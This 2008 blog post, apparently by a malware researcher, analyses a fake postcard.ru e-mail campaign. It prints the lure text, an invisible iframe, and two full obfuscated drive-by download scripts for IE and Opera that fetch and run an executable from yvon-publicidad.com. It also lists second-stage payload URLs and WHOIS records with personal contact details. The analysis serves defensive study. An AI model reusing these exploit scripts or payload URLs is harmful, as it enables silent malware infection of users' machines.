
Thursday 2 October 2008

Postcard.ru malware ... and esthost.eu make an appearance

Is it just me, or does this seem familiar? Of course it does: postcard.ru malware has been going around for yonks!

I received another e-mail today, and I must admit it's been a while since I've received one of these; nevertheless, the e-mail claimed to come from postcard.ru;

Вам пришла виртуальная открытка.
Для ее получения зайдите на сайт <http://www.postcard.ru/card.php?1970893242>
www.postcard.ru/card.php?2718276704 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
и нажмите на ссылку 'получить открытку'

Служба рассылки открыток POSTCARD.RU
------------------------------------------------

You recieved an postcard.
To get it follow to web-site <http://www.postcard.ru/card.php?3765275987>
www.postcard.ru/card.php?3373149370 <http://savichev.com/card.php?fr=HarrisScott&n=services@MY_DOMAIN>
switch to english and click on 'get my postcard'

Postcard service POSTCARD.RU


savichev.com (89.108.94.111, PTR: server5.pwstudio.ru) is the first site we see. This loads an iFrame to twain32.cn;

<iframe name="ABNHosting" src="http://www.twain32.cn/img/out.php?s_id=1&s=card" frameborder="0" border="0" height="1" width="100&quot;></iframe>


Ref:
http://vurl.mysteryfcm.co.uk/?url=132594

If you are using IE7 then twain32.cn returns the following;

 <script>
 function CreateO(os, nz)
 {
   var e0 = null;
   try
   {
     eval('e0 = os.CreateObject(nz)')
   }
   catch(e)
   {
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.CreateObject(nz, "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.CreateObject(nz, "", "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject("", nz)')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject(nz, "")')
     }
     catch(e)
     {
     }
   }
   if (! e0)
   {
     try
     {
       eval('e0 = os.GetObject(nz)')
     }
     catch(e)
     {
     }
   }
   return(e0);
 }
 function Download(a)
 {
   var lm = CreateO(a,'m'+'sxm'+'l2'+'.'+'X'+'M'+'LHT'+'TP');
   lm.open('G'+'E'+'T','http://www.yvon-publicidad.com/images/images.php?w=0&e=2',false);
   lm.send();
   var o = CreateO(a,'a'+'d'+'od'+'b'+'.'+'s'+'t'+'re'+'am');
   o.type = 1;
   o.Mode = 3;
   o.open();
   o.Write(lm.responseBody);
   var tut = ".//..//win"+".exe";
   o.savetoFile(tut,2);
   o.close();
   var s = CreateO(a, 'S'+'hel'+'l.A'+'pp'+'lic'+'at'+'ion');
   s.Shellexecute(tut);
 }
 var x = 0;
 var t = new Array(
'{B'+'D'+'96C'+'55'+'6-65'+'A3-11'+'D0'+'-98'+'3A-00'+'C0'+'4FC'+'29'+'E30}',
'{BD'+'96'+'C55'+'6-6'+'5A3-1'+'1D0-9'+'83'+'A-0'+'0C0'+'4F'+'C2'+'9E36}',null);
 while (t[x])
 {
   var a = null;
   if (t[x].substring(0,1) == '{')
     {
       a = document.createElement('object');
       a.setAttribute('cl'+'a'+'ss'+'id', 'cl'+'s'+'id:' + t[x].substring(1, t[x].length + 1));
     }
     else
     {
       try
       {
         a = new ActiveXObject(t[x]);
       }
       catch(e)
       {
       }
     }
     if (a)
     {
       try
       {
         var b = CreateO(a, 'Sh'+'el'+'l'+'.'+'A'+'p'+'pl'+'ica'+'ti'+'on');
         if (b)
         {
           if (Download(a)) break;
         }
       }
       catch(e)
       {
       }
     }
     x++;
   }
   setTimeout("window.location = 'jav.php'", 2500);
   </script>
   </body>
   </html>


If you are using Opera, you get the following;

<script language=javascript>  
// Opera branch. Creates a hidden about:blank iframe (display:none, id
// blank_iframe_window), appends it straight to `document`, and then evaluates
// the next stage inside that frame. Element names are split into string
// fragments ('if'+'ra'+'me' is iframe, 'st'+'yle' is style, 'i'+'d' is id).
blank_iframe = document.createElement('if'+'ra'+'me');  
blank_iframe.src = 'a'+'bo'+'ut:b'+'lank';  
blank_iframe.setAttribute('st'+'yle', 'disp'+'lay:n'+'one');  
blank_iframe.setAttribute('i'+'d', 'bla'+'nk_i'+'fram'+'e_w'+'indow');  
document.appendChild(blank_iframe);  
// `blank_iframe_window` is never declared; this apparently relies on the iframe's
// id being reachable as a global name (named-element lookup) - TODO confirm.
// The argument is one string literal spread over the following lines with
// backslash continuations. What it does, as far as the visible text shows:
// creates an iframe pointing at opera:config, a script element whose src is the
// yvon-publicidad.com payload URL, and an iframe pointing at opera:cache; once
// the script has loaded it reads the opera:cache listing, regex-matches the
// OPR*.EXE cache entry adjacent to that URL, and in the opera:config frame sets
// the Network / 'TN3270 App' preference to the cache directory plus that file
// name, then clicks a tn3270://nothing link so the cached download is launched
// as the protocol handler; a 1 s timer afterwards resets the preference to
// telnet.exe. Indicators for detection: iframes to opera:config / opera:cache,
// setPreference on 'TN3270 App', and tn3270:// links.
// Note on the listing: each continuation here is a backslash followed by
// trailing spaces; in a JS string literal the backslash only continues the line
// when the newline follows it directly, so this paste is presumably not
// byte-for-byte what the browser received.
blank_iframe_window.eval  
   ("config_iframe = document.createElement('if'+'ra'+'me');\  
   config_iframe.setAttribute('i'+'d', 'con'+'fig_if'+'rame_w'+'indow');\  
   config_iframe.src = 'op'+'era:c'+'on'+'fig';\  
    document.appendChild(config_iframe);\  
    app_iframe = document.createElement('sc'+'ri'+'pt');\  
    cache_iframe = document.createElement('if'+'ra'+'me');\  
    app_iframe.src = 'http://www.yvon-publicidad.com/images/images.php?w=0&e=2';\  
    app_iframe.onload = function ()\  
    {\  
        cache_iframe.src = 'op'+'er'+'a:c'+'ache';\  
        cache_iframe.onload = function ()\  
        {\  
            cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\  
            var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe
            .src.toUpperCase(), '');\ 
            filename = cache.match(re);\  
            config_iframe_window.eval\  
            (\"\  
            opera.setPreference('Ne'+'tw'+'or'+'k','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\  
            app_link = document.createElement('a');\  
            app_link.setAttribute('h'+'r'+'ef', 't'+'n3'+'270://n'+'oth'+'ing');\  
            app_link.click();\  
            setTimeout(function () {opera.setPreference('Ne'+'tw'+'ork','TN'+'327'+'0 A'+'pp','te'+'ln'+'et.'+'exe')},1000);\  
            \");\  
        };\  
        document.appendChild(cache_iframe);\  
    };\  
    document.appendChild(app_iframe);");  
</script>  
</body>  
</html>


Ref:
http://vurl.mysteryfcm.co.uk/?url=132605

twain32.cn resolves to the IP 195.5.116.239, which has a PTR that shows: src.esthost.eu (IP: 195.5.116.239). Alas, Whois.eu doesn't seem to allow a remote WhoIs, so we've gone to eurid.eu instead. No problem. When doing a WhoIs lookup on esthost.eu, we see;

Domain
Name esthost
Status REGISTERED
Registered April 7, 2006
Last update October 18, 2007, 12:48 pm

Registrant
Name Viktor Norin
Organisation Starline Web Services
Language English
Address
    PAE 21
    11415 Tallinn
    EE
    Estonia
Phone +372.6370911
Fax +372.6370911
Email hostmaster@esthost.eu

Registrar technical contacts
Name Domain Manager
Organisation PublicDomainRegistry.com
Language English
Address
    14525 SW Millikan #48732
    97005-2343 Beaverton
    Oregon
    United States
Phone +1.2013775952
Fax +1.320.2105146
Email domain.manager@publicdomainregistry.com

Registrar
Organisation PublicDomainRegistry.com
Website www.publicdomainregistry.com

Nameservers
ns2.esthost.eu (195.5.117.233)
ns1.esthost.eu (195.5.116.233)


Net-block information:

inetnum: 195.5.116.0 - 195.5.117.255
netname: EE-COMPIC
descr: Compic Ltd.
country: EE
org: ORG-CL48-RIPE
admin-c: RI215-RIPE
tech-c: RI215-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: AS3327-MNT
mnt-routes: AS3327-MNT
mnt-domains: AS3327-MNT
source: RIPE # Filtered

organisation: ORG-CL48-RIPE
org-name: Compic Ltd.
org-type: OTHER
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
phone: +372 6321028
e-mail: roman@compic.ee
admin-c: RI215-RIPE
mnt-ref: AS3327-MNT
mnt-by: AS3327-MNT
source: RIPE # Filtered

person: Roman Ivanov
address: Voru 1-28
address: 13612, Tallinn
address: Estonia
mnt-by: AS39823-MNT
phone: +3726321028
e-mail: roman@compic.ee
nic-hdl: RI215-RIPE
source: RIPE # Filtered

% Information related to '195.5.116.0/23AS39823'

route: 195.5.116.0/23
descr: Compic Ltd.
origin: AS39823
mnt-by: AS3327-MNT
source: RIPE # Filtered


Getting back to the infection, however: this comes courtesy of yvon-publicidad.com, as you can see in the source code above;

http://www.yvon-publicidad.com/images/images.php?w=0&e=2

This drops a 1.95K file called mstelnet.exe (FSG packed), which Avira flagged as;



This, according to ThreatExpert, downloads the following;

http://www.yvon-publicidad.com/images/images.php?w=1 (7.12K - HIDDENEXT/Crypted)
http://www.yvon-publicidad.com/images/images.php?w=2 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=3 (45K - TR/Crypt.Morphine.Gen)
http://www.yvon-publicidad.com/images/images.php?w=4 (27K - TR/Crypt.Morphine.Gen)

Ref:
http://www.threatexpert.com/report.aspx?md5=cbec5204eddd57aadc4b09d6d1a0a003

The report makes for very interesting reading, as it shows an injection into the IE process (it injects mswapi.dll), trojans and keyloggers - oh the fun!

WhoIs for the domain shows;

Registrant:
Guillain Jean-Daniel
21, rue des vertus
Marseille, 13005
France

Registrar: DOTREGISTRAR
Domain Name: YVON-PUBLICIDAD.COM
Created on: 20-MAY-05
Expires on: 20-MAY-09
Last Updated on: 06-APR-08


A little searching turned up a couple of other possibly related reports (previous versions?);

http://www.threatexpert.com/report.aspx?uid=d0ce4715-e6e2-4a3e-b4e0-69a2fb7698cb

http://research.sunbelt-software.com/ViewMalware.aspx?id=2787949
